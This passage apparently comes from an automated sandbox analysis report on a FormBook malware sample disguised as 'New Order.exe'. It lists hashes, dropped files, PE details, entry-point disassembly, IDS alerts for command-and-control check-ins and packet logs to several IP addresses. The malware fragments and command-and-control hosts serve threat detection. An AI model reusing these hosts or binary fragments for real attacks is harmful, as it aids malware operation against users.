                                                                  03062021.exeGet hashmaliciousBrowse
                                                                  • 208.91.197.27
                                                                  PROFORMA INVOICE PDF.exeGet hashmaliciousBrowse
                                                                  • 208.91.197.91
                                                                  PROFORMA INVOICE PDF.exeGet hashmaliciousBrowse
                                                                  • 208.91.197.91
                                                                  TELECOM-HKHongKongTelecomGlobalDataCentreHK#U20ac9,770 pdf.exeGet hashmaliciousBrowse
                                                                  • 163.53.16.248
                                                                  Quotation_05052021.Pdf.exeGet hashmaliciousBrowse
                                                                  • 194.145.196.19
                                                                  pYWw8rJe5q.exeGet hashmaliciousBrowse
                                                                  • 43.229.153.157
                                                                  nmGAaaF18P.exeGet hashmaliciousBrowse
                                                                  • 43.229.153.157
                                                                  RZpEmlKOcv.exeGet hashmaliciousBrowse
                                                                  • 43.229.153.157
                                                                  IMG_7742_Scanned.docGet hashmaliciousBrowse
                                                                  • 192.155.181.250
                                                                  Hxkidwv66m.exeGet hashmaliciousBrowse
                                                                  • 165.3.96.229
                                                                  quote20210126.exe.exeGet hashmaliciousBrowse
                                                                  • 192.155.181.96
                                                                  hwtVPZ3Oeh.exeGet hashmaliciousBrowse
                                                                  • 45.119.117.102
                                                                  wGIJWTsyOY.exeGet hashmaliciousBrowse
                                                                  • 45.119.117.102
                                                                  45z7cFhwjOBd.exeGet hashmaliciousBrowse
                                                                  • 43.229.153.56

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  C:\Users\user\AppData\Local\Temp\nssD6D3.tmp\System.dllhesaphareketi-0.exeGet hashmaliciousBrowse
                                                                    0FKzNO1g3P.exeGet hashmaliciousBrowse
                                                                      mlzHNUHkUl.exeGet hashmaliciousBrowse
                                                                        Ejima.exeGet hashmaliciousBrowse
                                                                          UrgentNewOrder_pdf.exeGet hashmaliciousBrowse
                                                                            Swift 001.exeGet hashmaliciousBrowse
                                                                              DHL DOCUMENTS.exeGet hashmaliciousBrowse
                                                                                DHL Shipment Documents.exeGet hashmaliciousBrowse
                                                                                  20210622-kll98374.exeGet hashmaliciousBrowse
                                                                                    SKMTC_STOMANAS_7464734648592848Ordengdoc.exeGet hashmaliciousBrowse
                                                                                      Orden de compra.exeGet hashmaliciousBrowse
                                                                                        Pending delivery - Final Attempt.exeGet hashmaliciousBrowse
                                                                                          2bni49vTpt.exeGet hashmaliciousBrowse
                                                                                            rJIeeo2B7Q.exeGet hashmaliciousBrowse
                                                                                              e-hesap bildirimi.exeGet hashmaliciousBrowse
                                                                                                Draft Booking Confirmation 062120297466471346.exeGet hashmaliciousBrowse
                                                                                                  HalkbankEkstre0609202138711233847204.exeGet hashmaliciousBrowse
                                                                                                    232.exeGet hashmaliciousBrowse
                                                                                                      Yeni Siparis.exeGet hashmaliciousBrowse
                                                                                                        Dhl.exeGet hashmaliciousBrowse

                                                                                                          Created / dropped Files

                                                                                                          C:\Users\user\AppData\Local\Temp\nssD6D3.tmp\System.dll
                                                                                                          Process:C:\Users\user\Desktop\New Order.exe
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10752
                                                                                                          Entropy (8bit):5.7425597599083344
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:uv+cJZE61KRWJQO6tFiUdK7ckK4k7l1XRBm0w+NiHi1GSJ:uf6rtFRduQ1W+fG8
                                                                                                          MD5:56A321BD011112EC5D8A32B2F6FD3231
                                                                                                          SHA1:DF20E3A35A1636DE64DF5290AE5E4E7572447F78
                                                                                                          SHA-256:BB6DF93369B498EAA638B0BCDC4BB89F45E9B02CA12D28BCEDF4629EA7F5E0F1
                                                                                                          SHA-512:5354890CBC53CE51081A78C64BA9C4C8C4DC9E01141798C1E916E19C5776DAC7C82989FAD0F08C73E81AABA332DAD81205F90D0663119AF45550B97B338B9CC3
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Joe Sandbox View:
                                                                                                          • Filename: hesaphareketi-0.exe, Detection: malicious, Browse
                                                                                                          • Filename: 0FKzNO1g3P.exe, Detection: malicious, Browse
                                                                                                          • Filename: mlzHNUHkUl.exe, Detection: malicious, Browse
                                                                                                          • Filename: Ejima.exe, Detection: malicious, Browse
                                                                                                          • Filename: UrgentNewOrder_pdf.exe, Detection: malicious, Browse
                                                                                                          • Filename: Swift 001.exe, Detection: malicious, Browse
                                                                                                          • Filename: DHL DOCUMENTS.exe, Detection: malicious, Browse
                                                                                                          • Filename: DHL Shipment Documents.exe, Detection: malicious, Browse
                                                                                                          • Filename: 20210622-kll98374.exe, Detection: malicious, Browse
                                                                                                          • Filename: SKMTC_STOMANAS_7464734648592848Ordengdoc.exe, Detection: malicious, Browse
                                                                                                          • Filename: Orden de compra.exe, Detection: malicious, Browse
                                                                                                          • Filename: Pending delivery - Final Attempt.exe, Detection: malicious, Browse
                                                                                                          • Filename: 2bni49vTpt.exe, Detection: malicious, Browse
                                                                                                          • Filename: rJIeeo2B7Q.exe, Detection: malicious, Browse
                                                                                                          • Filename: e-hesap bildirimi.exe, Detection: malicious, Browse
                                                                                                          • Filename: Draft Booking Confirmation 062120297466471346.exe, Detection: malicious, Browse
                                                                                                          • Filename: HalkbankEkstre0609202138711233847204.exe, Detection: malicious, Browse
                                                                                                          • Filename: 232.exe, Detection: malicious, Browse
                                                                                                          • Filename: Yeni Siparis.exe, Detection: malicious, Browse
                                                                                                          • Filename: Dhl.exe, Detection: malicious, Browse
                                                                                                          Reputation:moderate, very likely benign file
                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j....l.9..i....l.Richm.........................PE..L...X:.V...........!.................).......0...............................`......................................p2......t0..P............................P.......................................................0..X............................text............................... ..`.rdata.......0......."..............@..@.data...d....@.......&..............@....reloc.......P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          C:\Users\user\AppData\Local\Temp\vsfjb
                                                                                                          Process:C:\Users\user\Desktop\New Order.exe
                                                                                                          File Type:DOS executable (COM)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):57926
                                                                                                          Entropy (8bit):5.249711236819549
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:4sNQIgtk+T65l6IYdl7yUB/Bt8jIxTmTOQGpl/o36VB:4sNQIyk+e5wIY2UpBt8MsOp9o3eB
                                                                                                          MD5:681D07B1855C5A576FAC300525AEF5E5
                                                                                                          SHA1:AECB2FE8FD71ABA75DEC992F514E51CBD72AA282
                                                                                                          SHA-256:8301B3229F2779C0C4009D650FD60C913F74A8CE80225D2530B1E5B0674767A3
                                                                                                          SHA-512:DE6DE30255D840208D8649FA4AE6C7EE629EC7CEE7787FFC090CA2BF1F3E4DA4F61095AABF50FB1EDB0B088416A1E5BDD3F27C31C763A61C284095252B452D36
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 2%
                                                                                                          Reputation:low
                                                                                                          Preview: .....U..X........S..........e...............E.;.E.-.E...E.r.E.s.e..PS......;....+.....+..................5.........z.........J.......q+...-....+....................0.........+.3...Y..H......+.-....+._.......E...C3....J....#....g.....*........;..S+....+.._................j.t....0........-....3...O...+..........m..j.,.....+.+..............3...+.+....\..........B....}.....i+.3..63..n.......X+.+.3.....-......-.................+...q+.3..Z-......w........2.......;........3........ ........3.+.5....5......X[PS......;....+.....+..................5.........z.........J.......q+...-....+....................0.........+.3...Y..H......+.-....+._.......E...C3....J....#....g.....*........;..S+....+.._................j.t....0........-....3...O...+..........m..j.,.....+.+..............3...+.+....\..........B....}.....i+.3..63..n.......X+.+.3.....-......-.................+...q+.3..Z-......w........2.......;........3........ ........3.+.5....5...
                                                                                                          C:\Users\user\AppData\Local\Temp\zonlh1a303n85
                                                                                                          Process:C:\Users\user\Desktop\New Order.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):164351
                                                                                                          Entropy (8bit):7.98936475093836
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3072:EjxwKBZggdPTnGp3xLmsGmEe1LE1tJbHCnNUn3j04AXk2WrcnsgL4:2xwAd7GdxLdGmEeivJ1Q42wcsgL4
                                                                                                          MD5:D4BB6C3B11E85EEEA93B6461993B1561
                                                                                                          SHA1:69EDCDA9E995067C333C55036414FD4961C1F3A1
                                                                                                          SHA-256:0DF21A068840119834EDECA99F658F4582341D6295A26B0F8F03387A03F82402
                                                                                                          SHA-512:6B08C217B3FC83608A850263CE6C7912E466ED443809163385E43EFF20341CF3180624FBEB0B417C51DCEC97E07899B6239BA8EC2D904C086FCE5068AF1FCBF3
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview: ........&....3...Z..,N.;iUS.M...d.W.g.a......LG.%)N.....v.W.it...W....pBQ-+...=.`......V ~..7...........R......"up..I...&.C..............<..._.J...d)9.........J.?../.dUr..p...J....(o....#{.b......-O...W.].G?.....c...j.]......p..s...PGtk...H............l.z.....%......d.W.#g.a...#..LG.%)N.....vfW.i.....Q.....u..WI......-'...."T...%^ e....,V......7.dC..r"up..I{.../2g..z...V....j.p.S...hx0lg._;.f.#<..Zr}Q...@..dU..Wp.lJJ...(-....#{.bd.^.l..`.S..W.].G.yh..%c..h..].>..4.p.'s.Q..PGtk.........$..;..l.z.7.WT%.Y..=...d.W.g.a......LG.%)N.....vfW.i.....Q.....u..WI......-'...."T...%^ e....,V......7.dC..r"up..I{.../2g..z...V....j.p.S...hx0lg._;.f.#<..Zr}Q?../.dU...p..JJ..>.(o....#{.bd.^.l.-`...W.].G.yh..%c..h..].>..4.p.'s.Q..PGtk.........$..;..l.z.7.WT%.Y..=...d.W.g.a......LG.%)N.....vfW.i.....Q.....u..WI......-'...."T...%^ e....,V......7.dC..r"up..I{.../2g..z...V....j.p.S...hx0lg._;.f.#<..Zr}Q?../.dU...p..JJ..>.(o....#{.bd.^.l.-`...W.].G.yh..%c.

                                                                                                          Static File Info

                                                                                                          General

                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                          Entropy (8bit):7.882875340417013
                                                                                                          TrID:
                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                          File name:New Order.exe
                                                                                                          File size:206093
                                                                                                          MD5:4af03301316c984c17ca822456b6d918
                                                                                                          SHA1:ad237296e61bde6fe8ba894ec7445bb9bc76ab69
                                                                                                          SHA256:ac339f7ecac47cfc3a860ad42986d9f8d68208e7c7df8b21d4640ade4f2b5131
                                                                                                          SHA512:01988b176dfb0851fb9958c3948dbd2c434d0706b120f0609eecf157619bcd27f16741951d93fa4a236524f4f9cb46f171a9b4acf39b70fac26514eee8248f94
                                                                                                          SSDEEP:3072:QBynOpL12riocMMV6iTl2vFxqr91H9KANIlQoxOPTZEDHjMmRqZiOewWE:QBlL/Vd5yqB1HMVlJxOPODjMmEiOewX
                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@

                                                                                                          File Icon

                                                                                                          Icon Hash:b2a88c96b2ca6a72

                                                                                                          Static PE Info

                                                                                                          General

                                                                                                          Entrypoint:0x4030fb
                                                                                                          Entrypoint Section:.text
                                                                                                          Digitally signed:false
                                                                                                          Imagebase:0x400000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                          Time Stamp:0x56FF3A65 [Sat Apr 2 03:20:05 2016 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:4
                                                                                                          OS Version Minor:0
                                                                                                          File Version Major:4
                                                                                                          File Version Minor:0
                                                                                                          Subsystem Version Major:4
                                                                                                          Subsystem Version Minor:0
                                                                                                          Import Hash:b76363e9cb88bf9390860da8e50999d2

                                                                                                          Entrypoint Preview

                                                                                                          Instruction
                                                                                                          sub esp, 00000184h
                                                                                                          push ebx
                                                                                                          push ebp
                                                                                                          push esi
                                                                                                          push edi
                                                                                                          xor ebx, ebx
                                                                                                          push 00008001h
                                                                                                          mov dword ptr [esp+20h], ebx
                                                                                                          mov dword ptr [esp+14h], 00409168h
                                                                                                          mov dword ptr [esp+1Ch], ebx
                                                                                                          mov byte ptr [esp+18h], 00000020h
                                                                                                          call dword ptr [004070B0h]
                                                                                                          call dword ptr [004070ACh]
                                                                                                          cmp ax, 00000006h
                                                                                                          je 00007FA4A0C34A63h
                                                                                                          push ebx
                                                                                                          call 00007FA4A0C37844h
                                                                                                          cmp eax, ebx
                                                                                                          je 00007FA4A0C34A59h
                                                                                                          push 00000C00h
                                                                                                          call eax
                                                                                                          mov esi, 00407280h
                                                                                                          push esi
                                                                                                          call 00007FA4A0C377C0h
                                                                                                          push esi
                                                                                                          call dword ptr [00407108h]
                                                                                                          lea esi, dword ptr [esi+eax+01h]
                                                                                                          cmp byte ptr [esi], bl
                                                                                                          jne 00007FA4A0C34A3Dh
                                                                                                          push 0000000Dh
                                                                                                          call 00007FA4A0C37818h
                                                                                                          push 0000000Bh
                                                                                                          call 00007FA4A0C37811h
                                                                                                          mov dword ptr [00423F44h], eax
                                                                                                          call dword ptr [00407038h]
                                                                                                          push ebx
                                                                                                          call dword ptr [0040726Ch]
                                                                                                          mov dword ptr [00423FF8h], eax
                                                                                                          push ebx
                                                                                                          lea eax, dword ptr [esp+38h]
                                                                                                          push 00000160h
                                                                                                          push eax
                                                                                                          push ebx
                                                                                                          push 0041F4F0h
                                                                                                          call dword ptr [0040715Ch]
                                                                                                          push 0040915Ch
                                                                                                          push 00423740h
                                                                                                          call 00007FA4A0C37444h
                                                                                                          call dword ptr [0040710Ch]
                                                                                                          mov ebp, 0042A000h
                                                                                                          push eax
                                                                                                          push ebp
                                                                                                          call 00007FA4A0C37432h
                                                                                                          push ebx
                                                                                                          call dword ptr [00407144h]

                                                                                                          Rich Headers

                                                                                                          Programming Language:
                                                                                                          • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                          Data Directories

                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x74180xa0.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x2d0000xc68.rsrc
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x70000x27c.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                          Sections

                                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                          .text0x10000x5aeb0x5c00False0.665123980978data6.42230569414IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                          .rdata0x70000x11960x1200False0.458984375data5.20291736659IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .data0x90000x1b0380x600False0.432291666667data4.0475118296IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                          .ndata0x250000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .rsrc0x2d0000xc680xe00False0.405412946429data3.97774713785IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                          Resources

                                                                                                          NameRVASizeTypeLanguageCountry
                                                                                                          RT_ICON0x2d1d80x2e8dataEnglishUnited States
                                                                                                          RT_DIALOG0x2d4c00x100dataEnglishUnited States
                                                                                                          RT_DIALOG0x2d5c00x11cdataEnglishUnited States
                                                                                                          RT_DIALOG0x2d6e00x60dataEnglishUnited States
                                                                                                          RT_GROUP_ICON0x2d7400x14dataEnglishUnited States
                                                                                                          RT_VERSION0x2d7580x240data
                                                                                                          RT_MANIFEST0x2d9980x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                                          Imports

                                                                                                          DLLImport
                                                                                                          KERNEL32.dllGetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
                                                                                                          USER32.dllSetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
                                                                                                          GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                          SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
                                                                                                          ADVAPI32.dllRegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                                                          COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                          ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                                                          Version Infos

                                                                                                          DescriptionData
                                                                                                          LegalCopyrighttenants
                                                                                                          FileVersion8.0.7.4
                                                                                                          CompanyNameamply
                                                                                                          LegalTrademarkslieutenant
                                                                                                          Commentssims
                                                                                                          ProductNamemediator
                                                                                                          FileDescriptionpowering
                                                                                                          Translation0x0000 0x04e4

                                                                                                          Possible Origin

                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                          EnglishUnited States

                                                                                                          Network Behavior

                                                                                                          Snort IDS Alerts

                                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                          06/22/21-18:05:57.232848TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976580192.168.2.434.102.136.180
                                                                                                          06/22/21-18:05:57.232848TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976580192.168.2.434.102.136.180
                                                                                                          06/22/21-18:05:57.232848TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976580192.168.2.434.102.136.180
                                                                                                          06/22/21-18:05:57.373182TCP1201ATTACK-RESPONSES 403 Forbidden804976534.102.136.180192.168.2.4
                                                                                                          06/22/21-18:06:46.522727TCP2031453ET TROJAN FormBook CnC Checkin (GET)4977880192.168.2.435.209.88.35
                                                                                                          06/22/21-18:06:46.522727TCP2031449ET TROJAN FormBook CnC Checkin (GET)4977880192.168.2.435.209.88.35
                                                                                                          06/22/21-18:06:46.522727TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977880192.168.2.435.209.88.35
                                                                                                          06/22/21-18:06:47.354678ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                                                                                          06/22/21-18:06:51.976615TCP1201ATTACK-RESPONSES 403 Forbidden804977934.102.136.180192.168.2.4
                                                                                                          06/22/21-18:06:57.245840TCP1201ATTACK-RESPONSES 403 Forbidden804978034.102.136.180192.168.2.4
                                                                                                          06/22/21-18:07:02.503415TCP1201ATTACK-RESPONSES 403 Forbidden804978134.102.136.180192.168.2.4

                                                                                                          Network Port Distribution

                                                                                                          TCP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Jun 22, 2021 18:05:57.189275980 CEST4976580192.168.2.434.102.136.180
                                                                                                          Jun 22, 2021 18:05:57.232598066 CEST804976534.102.136.180192.168.2.4
                                                                                                          Jun 22, 2021 18:05:57.232733965 CEST4976580192.168.2.434.102.136.180
                                                                                                          Jun 22, 2021 18:05:57.232847929 CEST4976580192.168.2.434.102.136.180
                                                                                                          Jun 22, 2021 18:05:57.275851965 CEST804976534.102.136.180192.168.2.4
                                                                                                          Jun 22, 2021 18:05:57.373182058 CEST804976534.102.136.180192.168.2.4
                                                                                                          Jun 22, 2021 18:05:57.373228073 CEST804976534.102.136.180192.168.2.4
                                                                                                          Jun 22, 2021 18:05:57.373451948 CEST4976580192.168.2.434.102.136.180
                                                                                                          Jun 22, 2021 18:05:57.373501062 CEST4976580192.168.2.434.102.136.180
                                                                                                          Jun 22, 2021 18:05:57.672857046 CEST4976580192.168.2.434.102.136.180
                                                                                                          Jun 22, 2021 18:05:57.716026068 CEST804976534.102.136.180192.168.2.4
                                                                                                          Jun 22, 2021 18:06:02.444720030 CEST4977180192.168.2.4192.155.181.250
                                                                                                          Jun 22, 2021 18:06:05.454973936 CEST4977180192.168.2.4192.155.181.250
                                                                                                          Jun 22, 2021 18:06:11.470927954 CEST4977180192.168.2.4192.155.181.250
                                                                                                          Jun 22, 2021 18:06:25.891266108 CEST4977280192.168.2.4192.155.181.250
                                                                                                          Jun 22, 2021 18:06:28.714240074 CEST4977380192.168.2.4208.91.197.91
                                                                                                          Jun 22, 2021 18:06:28.879081964 CEST8049773208.91.197.91192.168.2.4
                                                                                                          Jun 22, 2021 18:06:28.881302118 CEST4977380192.168.2.4208.91.197.91
                                                                                                          Jun 22, 2021 18:06:28.881365061 CEST4977380192.168.2.4208.91.197.91
                                                                                                          Jun 22, 2021 18:06:28.894260883 CEST4977280192.168.2.4192.155.181.250
                                                                                                          Jun 22, 2021 18:06:29.087789059 CEST8049773208.91.197.91192.168.2.4
                                                                                                          Jun 22, 2021 18:06:29.140470028 CEST8049773208.91.197.91192.168.2.4
                                                                                                          Jun 22, 2021 18:06:29.140527964 CEST8049773208.91.197.91192.168.2.4
                                                                                                          Jun 22, 2021 18:06:29.140558004 CEST8049773208.91.197.91192.168.2.4
                                                                                                          Jun 22, 2021 18:06:29.140656948 CEST4977380192.168.2.4208.91.197.91
                                                                                                          Jun 22, 2021 18:06:29.140723944 CEST4977380192.168.2.4208.91.197.91
                                                                                                          Jun 22, 2021 18:06:29.275923967 CEST8049773208.91.197.91192.168.2.4
                                                                                                          Jun 22, 2021 18:06:29.276143074 CEST4977380192.168.2.4208.91.197.91
                                                                                                          Jun 22, 2021 18:06:29.304333925 CEST8049773208.91.197.91192.168.2.4
                                                                                                          Jun 22, 2021 18:06:34.232399940 CEST4977680192.168.2.4107.161.23.204
                                                                                                          Jun 22, 2021 18:06:34.371625900 CEST8049776107.161.23.204192.168.2.4
                                                                                                          Jun 22, 2021 18:06:34.371841908 CEST4977680192.168.2.4107.161.23.204
                                                                                                          Jun 22, 2021 18:06:34.372102976 CEST4977680192.168.2.4107.161.23.204
                                                                                                          Jun 22, 2021 18:06:34.511465073 CEST8049776107.161.23.204192.168.2.4
                                                                                                          Jun 22, 2021 18:06:34.511514902 CEST8049776107.161.23.204192.168.2.4
                                                                                                          Jun 22, 2021 18:06:34.511545897 CEST8049776107.161.23.204192.168.2.4
                                                                                                          Jun 22, 2021 18:06:34.511785030 CEST4977680192.168.2.4107.161.23.204
                                                                                                          Jun 22, 2021 18:06:34.511912107 CEST4977680192.168.2.4107.161.23.204
                                                                                                          Jun 22, 2021 18:06:34.651163101 CEST8049776107.161.23.204192.168.2.4
                                                                                                          Jun 22, 2021 18:06:34.895009041 CEST4977280192.168.2.4192.155.181.250
                                                                                                          Jun 22, 2021 18:06:39.602884054 CEST4977780192.168.2.4160.153.78.1
                                                                                                          Jun 22, 2021 18:06:39.786284924 CEST8049777160.153.78.1192.168.2.4
                                                                                                          Jun 22, 2021 18:06:39.786525965 CEST4977780192.168.2.4160.153.78.1
                                                                                                          Jun 22, 2021 18:06:39.786784887 CEST4977780192.168.2.4160.153.78.1
                                                                                                          Jun 22, 2021 18:06:39.970570087 CEST8049777160.153.78.1192.168.2.4
                                                                                                          Jun 22, 2021 18:06:40.022874117 CEST8049777160.153.78.1192.168.2.4
                                                                                                          Jun 22, 2021 18:06:40.022923946 CEST8049777160.153.78.1192.168.2.4
                                                                                                          Jun 22, 2021 18:06:40.023248911 CEST4977780192.168.2.4160.153.78.1
                                                                                                          Jun 22, 2021 18:06:40.023399115 CEST4977780192.168.2.4160.153.78.1
                                                                                                          Jun 22, 2021 18:06:40.207359076 CEST8049777160.153.78.1192.168.2.4
                                                                                                          Jun 22, 2021 18:06:46.370055914 CEST4977880192.168.2.435.209.88.35
                                                                                                          Jun 22, 2021 18:06:46.522447109 CEST804977835.209.88.35192.168.2.4
                                                                                                          Jun 22, 2021 18:06:46.522556067 CEST4977880192.168.2.435.209.88.35
                                                                                                          Jun 22, 2021 18:06:46.522727013 CEST4977880192.168.2.435.209.88.35
                                                                                                          Jun 22, 2021 18:06:46.674983025 CEST804977835.209.88.35192.168.2.4
                                                                                                          Jun 22, 2021 18:06:46.698638916 CEST804977835.209.88.35192.168.2.4
                                                                                                          Jun 22, 2021 18:06:46.698688030 CEST804977835.209.88.35192.168.2.4
                                                                                                          Jun 22, 2021 18:06:46.698724985 CEST804977835.209.88.35192.168.2.4
                                                                                                          Jun 22, 2021 18:06:46.698776007 CEST804977835.209.88.35192.168.2.4
                                                                                                          Jun 22, 2021 18:06:46.698802948 CEST4977880192.168.2.435.209.88.35
                                                                                                          Jun 22, 2021 18:06:46.698832035 CEST804977835.209.88.35192.168.2.4
                                                                                                          Jun 22, 2021 18:06:46.698836088 CEST4977880192.168.2.435.209.88.35
                                                                                                          Jun 22, 2021 18:06:46.698888063 CEST804977835.209.88.35192.168.2.4
                                                                                                          Jun 22, 2021 18:06:46.698904037 CEST4977880192.168.2.435.209.88.35
                                                                                                          Jun 22, 2021 18:06:46.698915958 CEST4977880192.168.2.435.209.88.35
                                                                                                          Jun 22, 2021 18:06:46.698941946 CEST804977835.209.88.35192.168.2.4
                                                                                                          Jun 22, 2021 18:06:46.698951006 CEST4977880192.168.2.435.209.88.35
                                                                                                          Jun 22, 2021 18:06:46.698992014 CEST804977835.209.88.35192.168.2.4
                                                                                                          Jun 22, 2021 18:06:46.698998928 CEST4977880192.168.2.435.209.88.35
                                                                                                          Jun 22, 2021 18:06:46.699038982 CEST804977835.209.88.35192.168.2.4
                                                                                                          Jun 22, 2021 18:06:46.699047089 CEST4977880192.168.2.435.209.88.35
                                                                                                          Jun 22, 2021 18:06:46.699091911 CEST804977835.209.88.35192.168.2.4
                                                                                                          Jun 22, 2021 18:06:46.699094057 CEST4977880192.168.2.435.209.88.35
                                                                                                          Jun 22, 2021 18:06:46.699151039 CEST4977880192.168.2.435.209.88.35
                                                                                                          Jun 22, 2021 18:06:46.851478100 CEST804977835.209.88.35192.168.2.4
